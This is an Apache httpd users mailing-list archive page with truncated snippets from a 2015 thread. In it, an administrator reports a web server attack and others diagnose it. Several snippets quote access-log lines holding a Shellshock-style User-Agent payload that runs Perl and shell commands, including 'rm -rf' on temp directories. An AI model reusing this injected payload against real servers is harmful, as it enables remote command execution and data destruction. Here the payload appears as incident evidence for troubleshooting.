Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
s wrong. There is no gravity. The Earth sucks. *Von:* Victor Sterpu [vic...@casnt.ro] *Gesendet:* Donnerstag, 2. Juli 2015 14:29 *An:* users@httpd.apache.org *Betreff:* **SPAM?** Re: [users@httpd] Security question [wd-vc] In th

Re: [users@httpd] Security question

2015-07-02 Thread Bremser, Kurt (AMOS Austria GmbH)
terpu [vic...@casnt.ro] Gesendet: Donnerstag, 2. Juli 2015 14:29 An: users@httpd.apache.org Betreff: **SPAM?** Re: [users@httpd] Security question [wd-vc] In the end the attack was succesfull. Log show the last command: 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 &qu

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
On 02.07.2015 17:55, Kurtis Rader wrote: On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu > wrote: A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
Yes. On 02.07.2015 21:16, David Grant wrote: Cgi module in php? Sent from my iPad On Jul 2, 2015, at 5:00 AM, Victor Sterpu wrote: Hello A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_

Re: [users@httpd] Security question

2015-07-02 Thread David Grant
Cgi module in php? Sent from my iPad > On Jul 2, 2015, at 5:00 AM, Victor Sterpu wrote: > > Hello > > A hacker attacked a apache2 web server by HTTP injection. > The log show what he has done: > 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper > HTTP/1.1" 404 280 "-" "(

Re: [users@httpd] Security question

2015-07-02 Thread Kurtis Rader
On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu wrote: > A hacker attacked a apache2 web server by HTTP injection. > The log show what he has done: > 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper > HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: > t

Re: [users@httpd] Security question

2015-07-02 Thread Eric Covener
On Thu, Jul 2, 2015 at 8:29 AM, Victor Sterpu wrote: > In the end the attack was succesfull. Log show the last command: > 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" > "() { :;};/usr/bin/perl -e 'print \"Content-Type: > text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
In the end the attack was succesfull. Log show the last command: 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; r

Re: [users@httpd] Security question

2015-07-02 Thread Yehuda Katz
It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful. - Y Sent from a gizmo with a very small keyboard and hyperactive autocorrect. On Jul 2, 2015 8:00 AM, "Victor Sterpu" wrote: > Hello